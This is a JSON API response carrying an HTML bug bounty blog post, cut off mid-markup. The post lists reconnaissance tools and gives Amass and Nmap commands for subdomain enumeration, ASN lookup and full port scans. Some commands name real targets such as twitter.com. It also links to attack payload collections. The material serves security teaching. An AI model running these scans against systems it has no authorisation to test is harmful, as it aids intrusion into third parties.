GET /api/v1/blogs/list?page=1
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "count": 23,
    "total_pages": 2,
    "results": [
        {
            "title": "Essential RECON Tools",
            "blog_id": "essential-recon-tools",
            "author": "Anshuman Pattnaik",
            "published_date": "2021-08-23T19:36:17.154823Z",
            "last_updated_date": "2021-08-23T22:23:12.533690Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/essential-recon-tools/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/essential-recon-tools/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/essential-recon-tools/large_thumbnail.png",
            "keywords": [
                "Bug Bounty",
                "RECON",
                "Web Security"
            ],
            "highlights": "In this article, I'll discuss my favourite recon tools which I often use in Bug Bounty. And a few years ago, I posted a Twitter post by sharing my RECON steps for Bug Bounty with essential tools and that Twitter post got some serious attention and people from all over the world from security saw that post. And the thread got more than 40,000 views, till today also people are following that thread, really appreciated it.",
            "description": "<font size=\"4\">In this article, I'll discuss my&nbsp;</font><font size=\"4\">favourite recon tools which I often use in Bug Bounty. And a few years ago, I posted a Twitter post by sharing my RECON steps for Bug Bounty with essential tools and that Twitter post got some serious attention and people from all over the world from InfoSec community saw that post, and the thread got more than <font color=\"#45b8ac\"><b>40,000</b></font> views, till today also people are following that thread, really appreciated it.</font><div><br></div><div><script async=\"\" src=\"/static/js/widgets.js\" charset=\"utf-8\"></script>\n<div class=\"twitter-tweet twitter-tweet-rendered\" style=\"display: flex; max-width: 550px; width: 100%; margin-top: 10px; margin-bottom: 10px;\"><iframe id=\"twitter-widget-1\" scrolling=\"no\" frameborder=\"0\" allowtransparency=\"true\" allowfullscreen=\"true\" class=\"\" style=\"position: static; visibility: visible; width: 550px; height: 465px; display: block; flex-grow: 1;\" title=\"Twitter Tweet\" src=\"https://platform.twitter.com/embed/Tweet.html?dnt=false&amp;embedId=twitter-widget-1&amp;features=eyJ0ZndfZXhwZXJpbWVudHNfY29va2llX2V4cGlyYXRpb24iOnsiYnVja2V0IjoxMjA5NjAwLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2hvcml6b25fdHdlZXRfZW1iZWRfOTU1NSI6eyJidWNrZXQiOiJodGUiLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3NwYWNlX2NhcmQiOnsiYnVja2V0Ijoib2ZmIiwidmVyc2lvbiI6bnVsbH19&amp;frame=false&amp;hideCard=false&amp;hideThread=false&amp;id=1183269184052088832&amp;lang=en&amp;origin=https%3A%2F%2Fadmin.hackbotone.com%2Fhackbotone-admin-internal-admin-app%2Fupdate-blog%2Fessential-recon-tools&amp;sessionId=54d94674ed18de14c1a56c0b2cc7d6a8f8cd1ab1&amp;theme=light&amp;widgetsVersion=1890d59c%3A1627936082797&amp;width=550px\" data-tweet-id=\"1183269184052088832\"></iframe></div></div><div><br></div><div><font size=\"4\">So, I thought to make a blog post about it and explain my favourite recon tools, so it will be more helpful to everyone why RECON is essential during Bug Hunting?&nbsp;</font><span style=\"font-size: large;\">There are some new tools I have added to my RECON. I'll update this list once I explore new tools.</span></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Let's discuss all the tooling.</font></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">Tools</font></b></div><div><ul><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Amass - (Subdomain Enumeration, ASN Enumeration)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Nmap - (Port Scanning, OS Detection and many more)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Wappalyzer Chrome Extension - (Identify technologies on websites)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">FFuF/Dirsearch - (Content Discovery)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Wordlists/Payloads - (SecLists &amp; PayloadsAllTheThings)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Turbo Intruder - (Race Condition/HTTP Request Smuggling)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Param Miner - (Web cache poisoning)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Burp Collaborator - (Blind SSRF Exploits &amp; Command Injection)</font></span></li><li style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">SQLmap - (SQL Injection)</font></span></li></ul><div><font color=\"#0e101a\"><b style=\"\"><font size=\"5\"><br></font></b></font></div><div><font color=\"#0e101a\"><b style=\"\"><font size=\"5\">Amass</font></b></font></div></div><div><font color=\"#0e101a\"><b style=\"\"><font size=\"5\"><br></font></b></font></div><div><font color=\"#0e101a\" size=\"4\">During subdomain enumerations and information gathering about a target, I always use this tool because it has so many options to find out some serious information about the target like - ASNs information, Discovering IPv4/IPv6, Concurrent DNS queries, Brute force subdomains, Assets Discovery, etc. And this is the only tool you should spend more time during RECON and tried to collect as many subdomains as you can.</font><br></div><div><font color=\"#0e101a\" size=\"4\"><b style=\"\"><br></b></font></div><div><strong style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"4\" style=\"\">Essential Commands</font></strong></div><div> <script async=\"\" src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\"></script><div><div> \n<script async=\"\" src=\"/static/js/widgets.js\" charset=\"utf-8\"></script><div> \n<script async=\"\" src=\"/widgets.js\" charset=\"utf-8\"></script><div> \n<script async=\"\" src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\"></script><div> \n<script async=\"\" src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\"></script><div><div class=\"code-toolbar\"><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Cop</button></div></div></div></div></div></div></div></div></div></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass <span class=\"token keyword\">enum</span> <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span>\namass <span class=\"token keyword\">enum</span> <span class=\"token operator\">-</span>active <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span> <span class=\"token operator\">-</span>p <span class=\"token number\">80</span><span class=\"token punctuation\">,</span><span class=\"token number\">443</span><span class=\"token punctuation\">,</span><span class=\"token number\">8080</span>\namass <span class=\"token keyword\">enum</span> <span class=\"token operator\">-</span>ipv4 <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span>\namass <span class=\"token keyword\">enum</span> <span class=\"token operator\">-</span>ipv6 <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span>\namass <span class=\"token keyword\">enum</span> <span class=\"token operator\">-</span>brute <span class=\"token operator\">-</span>min<span class=\"token operator\">-</span><span class=\"token keyword control-flow\">for</span><span class=\"token operator\">-</span>recursive <span class=\"token number\">3</span> <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div></div><div><h2 style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\"><br></font></span></h2><h2 style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><font size=\"4\">Reverse Whois</font></span></h2></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass intel <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span> <span class=\"token operator\">-</span>whois</code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b><font size=\"4\">Identify subdomains by reading SSL/TLS certificates.</font></b></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass intel <span class=\"token operator\">-</span>active <span class=\"token operator\">-</span>cidr  <span class=\"token number\">93.184</span><span class=\"token number\">.216</span><span class=\"token number\">.34</span><span class=\"token operator\">/</span><span class=\"token number\">24</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b><font size=\"4\">ASNs</font></b></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass intel <span class=\"token operator\">-</span>org <span class=\"token string\">\"Twitter\"</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass intel <span class=\"token operator\">-</span>active <span class=\"token operator\">-</span>asn <span class=\"token number\">54888</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b><font size=\"4\">ASN Reverse Whois</font></b></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass intel <span class=\"token operator\">-</span>asn <span class=\"token number\">54888</span> <span class=\"token operator\">-</span>whois  <span class=\"token operator\">-</span>d twitter<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"4\">APIs</font></strong></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"color: rgb(0, 0, 0); font-weight: 400;\"><font size=\"4\">Amass collects subdomains from various sources, and all these sources require API keys. And it would be great if you can set up an account from all of these platforms and get one API Key, then your chances are always high to collect a large number of subdomains.</font></span></strong></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"color: rgb(0, 0, 0); font-weight: 400;\"><font size=\"4\"><br></font></span></strong></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"color: rgb(0, 0, 0);\"><font size=\"4\" style=\"\">Data Sources</font></span></strong></div><div><div class=\"code-toolbar\"><pre class=\" language-js\">AlienVault, Anubis, BinaryEdge, BGPView, BufferOver, C99, Chaos, CIRCL, Cloudflare, CommonCrawl, DNSDB, GitHub, HackerTarget, Hunter, IPinfo, Mnemonic, NetworksDB, \nPassiveTotal, RADb, ReconDev, Robtex, SecurityTrails, ShadowServer, Shodan, SonarSearch, Spyse, Sublist3rAPI, TeamCymru, ThreatBook, ThreatCrowd, ThreatMiner, \nTwitter, Umbrella, URLScan, VirusTotal, WhoisXMLAPI, ZETAlytics, ZoomEye</pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\">Once your accounts are ready, put all of the API keys into a config.ini file, y</font><span style=\"font-size: large;\">ou can refer to the example config.ini file from here&nbsp;</span><span style=\"font-size: large;\">- </span><a href=\"https://github.com/OWASP/Amass/blob/master/examples/config.ini\" style=\"font-size: large;\"><font color=\"#dd4124\">Example Config.ini</font></a></div><div><b><br></b></div><div><b><font size=\"4\">Config Command</font></b></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass <span class=\"token keyword\">enum</span> <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span> <span class=\"token operator\">-</span>config config<span class=\"token punctuation\">.</span><span class=\"token property-access\">ini</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div></div></div><div><br></div><div><font size=\"4\"><b>GitHub Project</b>&nbsp;-&nbsp;</font><a href=\"https://github.com/OWASP/Amass\"><font color=\"#dd4124\"><b>OWASP/Amass</b></font></a></div><div><br></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\">Nmap</font></strong><br></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\"><br></font></strong></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font style=\"\"><font color=\"#0e101a\" size=\"4\">These are the below Nmap commands mostly I am following during my scanning phase.</font><br></font></span></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font style=\"\"><font color=\"#0e101a\" size=\"4\"><br></font></font></span></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font style=\"\"><p style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"font-size: large;\"><b>Checking target host is reachable</b></span><br></p></font></span></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">nmap <span class=\"token operator\">-</span>sn <span class=\"token number\">93.184</span><span class=\"token number\">.216</span><span class=\"token number\">.34</span><span class=\"token operator\">/</span><span class=\"token number\">24</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\"><b>Scan all ports</b></font></div><div><div class=\"code-toolbar\"><pre class=\" language-js\">nmap -p 1-65535 www.example.com<br></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\"><b>Full TCP port scan to find out service version detection</b></font></div><div><div class=\"code-toolbar\"><pre class=\" language-js\">nmap -p 1-65535 -sV -sS -T4 www.example.com<br></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\">Wappalyzer</font>&nbsp;</strong></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><br></strong></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font color=\"#0e101a\" size=\"4\">Wappalyzer is one of the best tools to identify the technology behind a website. I'll highly recommend using this tool, and it's available for both Chrome &amp; Firefox as an extension.</font><br></span></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font color=\"#0e101a\" size=\"4\"><br></font></span></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"4\"><b style=\"\">Extenstions</b></font></span></div><div><ul><li><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"4\"><font color=\"#dd4124\"><b style=\"\"><a href=\"https://chrome.google.com/webstore/detail/wappalyzer/gppongmhjkpfnbhagpmjfkannfbllamg?hl=en\" style=\"\"><font color=\"#dd4124\">Chrome</font></a></b></font></font></span></li><li><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"4\"><font color=\"#dd4124\"><b style=\"font-size: medium;\"><font size=\"4\" style=\"\"><a href=\"https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/\" style=\"\"><font color=\"#dd4124\">Firefox&nbsp;</font></a></font></b></font></font></span></li></ul></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\"><br></font></strong></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\">FFuF/Dirsearch</font></strong><br></div><div><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\"><br></font></strong></div><div><span data-preserver-spaces=\"true\" style=\"font-size: large; color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\">I use&nbsp;</span><span style=\"font-size: large; color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\">ffuf/dirsearch&nbsp;</span></span><span data-preserver-spaces=\"true\" style=\"font-size: large; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font color=\"#0e101a\">for content discovery, and both the tools are great and easy to use. I recommend using the </font><a href=\"https://github.com/danielmiessler/SecLists\"><font color=\"#dd4124\">SecLists</font></a><font color=\"#0e101a\"> wordlists repository during fuzzing.&nbsp;</font></span><br></div><div><span style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"4\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><br></span></font></span></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\" data-preserver-spaces=\"true\"><div style=\"font-size: large; color: rgb(14, 16, 26);\"><b>GitHub Projects</b>&nbsp;</div><div style=\"\"><ul style=\"font-size: large;\"><li><a href=\"https://github.com/ffuf/ffuf\"><font color=\"#dd4124\"><b>ffuf</b></font></a></li><li style=\"\"><a href=\"https://github.com/maurosoria/dirsearch\" style=\"\"><font color=\"#dd4124\"><b>dirsearch</b></font></a></li></ul><div style=\"font-size: large;\"><br></div><div style=\"\"><span style=\"color: rgb(14, 16, 26);\"><font size=\"5\"><b>Wordlists/Payloads</b></font></span><br></div><div style=\"\"><span style=\"color: rgb(14, 16, 26);\"><font size=\"5\"><b><br></b></font></span></div><div style=\"\"><p style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><strong style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"4\">SecLists</font></strong></p><p style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"></p><ul style=\"\"><li style=\"\"><strong style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><a href=\"https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content\" style=\"\"><font color=\"#dd4124\">Web-Content</font></a></strong><span data-preserver-spaces=\"true\" style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"></span></li><li style=\"\"><b><a href=\"https://github.com/danielmiessler/SecLists/tree/master/Discovery/Variables\"><font color=\"#dd4124\">Variables</font></a></b></li><li style=\"\"><b><a href=\"https://github.com/danielmiessler/SecLists/tree/master/Usernames\"><font color=\"#dd4124\">Usernames</font></a></b></li><li style=\"\"><b><a href=\"https://github.com/danielmiessler/SecLists/tree/master/Passwords\"><font color=\"#dd4124\">Passwords</font></a></b></li></ul><div><b>Payloads</b></div><div><ul><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/API%20Key%20Leaks\"><font color=\"#dd4124\">API Key Leaks</font></a></b><br></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal\"><font color=\"#dd4124\">Directory traversal</font></a></b><br></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection\"><font color=\"#dd4124\">Templates Injections</font></a></b></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token\"><font color=\"#dd4124\">JWT - JSON Web Token</font></a></b><br></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth\"><font color=\"#dd4124\">OAuth</font></a></b><br></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect\"><font color=\"#dd4124\">Open URL Redirection</font></a></b><br></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery\"><font color=\"#dd4124\">Server-Side Request Forgery</font></a></b><br></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files\"><font color=\"#dd4124\">Upload Insecure Files</font></a></b><br></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection\"><font color=\"#dd4124\">XML External Entity</font></a></b><br></li><li><b><a href=\"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CORS%20Misconfiguration\"><font color=\"#dd4124\">CORS Misconfiguration</font></a></b><br></li></ul><div><span style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><b><font size=\"5\"><br></font></b></span></div><div><span style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><b><font size=\"5\">Turbo Intruder</font></b></span><br></div></div><div><span style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><b><font size=\"5\"><br></font></b></span></div><div><span style=\"background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><div style=\"font-size: large;\"><font color=\"#0e101a\">It is one more burp extension coded by </font><a href=\"https://twitter.com/albinowax\"><font color=\"#dd4124\">James Kettle - @albinowax</font></a><font color=\"#0e101a\">. And the purpose of this tool is to send faster HTTP requests around (<i>30,000 requests per second</i>). The most exciting part the attacks are configured using python script.</font></div><div style=\"font-size: large; color: rgb(14, 16, 26);\"><br></div><div style=\"font-size: large; color: rgb(14, 16, 26);\">I use this tool regularly to exploit Race Condition/HTTP Request Smuggling&nbsp;vulnerability.</div><div style=\"font-size: large; color: rgb(14, 16, 26);\"><br></div><div style=\"font-size: large;\"><b style=\"color: rgb(14, 16, 26);\">GitHub Project -&nbsp;</b><a href=\"https://github.com/PortSwigger/turbo-intruder\"><font color=\"#dd4124\"><b>turbo-intruder</b></font></a></div><div style=\"font-size: large;\"><br></div><div style=\"\"><strong style=\"color: rgb(14, 16, 26); background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; margin-top: 0pt; margin-bottom: 0pt;\"><font size=\"5\">Param Miner</font></strong><br></div><div style=\"\"><strong style=\"color: rgb(14, 16, 